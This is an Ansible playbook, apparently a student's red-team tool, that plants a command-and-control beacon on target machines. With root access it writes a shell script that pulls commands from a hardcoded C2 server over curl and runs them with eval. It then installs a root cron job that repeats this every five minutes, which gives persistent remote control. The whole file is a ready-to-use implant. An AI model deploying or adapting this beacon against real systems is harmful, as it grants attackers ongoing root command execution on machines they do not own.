---
#Roberto Reade
#rar9027@g.rit.edu
#Red Team tool

- name: Setup Beacon/Callback        # Name of the playbook, the setup of a beacon/callback
  hosts: target        #specifies target machines (Ensure inventory.ini is correct for this)
  become: yes        #enables root access for certian tasks
  tasks:        #List of tasks are below
    - name: Ensure curl is installed        #task to ensure curl is installed on target (required for HTTP)
      apt:
        name: curl        #specifies the package of curl to install
        state: present        #Ensures curl is installed
      tags: curl        #curl tag

    - name: Set up beacon callback script        #task to deploy the beacon callback script on target machine
      copy:
        dest: /tmp/beacon_callback.sh       #this is the destination path for the script
        mode: '0755'        #permissions for script (rwx for owner and rx for others)
        content: |        #Beginning of scripts content

          #Edit the IP to be the IP of the C2 server
          C2_SERVER="http://100.65.2.57/instructions"        #Defines the C2 server address


          if ! command -v curl &> /dev/null; then        #checks if curl is installed and installs it if it isn't
              apt update && apt install -y curl        #Update and installs curl (Debian only command)
          fi

          cmd=$(curl -s $C2_SERVER)        #uses curl to fetch commands from C2 server


          if [[ -n "$cmd" ]]; then        #checks if a command was recieved
              eval "$cmd"        #executes recieved command
          fi
      tags: script        #script tag

    - name: Set up cron job for beacon callback        #task to set up a cron job to run beacon script periodically
      cron:
        name: "Beacon Callback"        #name for cron job
        user: root        #the user where cron job will be run (can be changed)
        job: "/tmp/beacon_callback.sh"        #command to execute with cron job
        minute: "*/5"        #frequency of cron job (it will run every 5 minutes)
      tags: cron        #cron tag
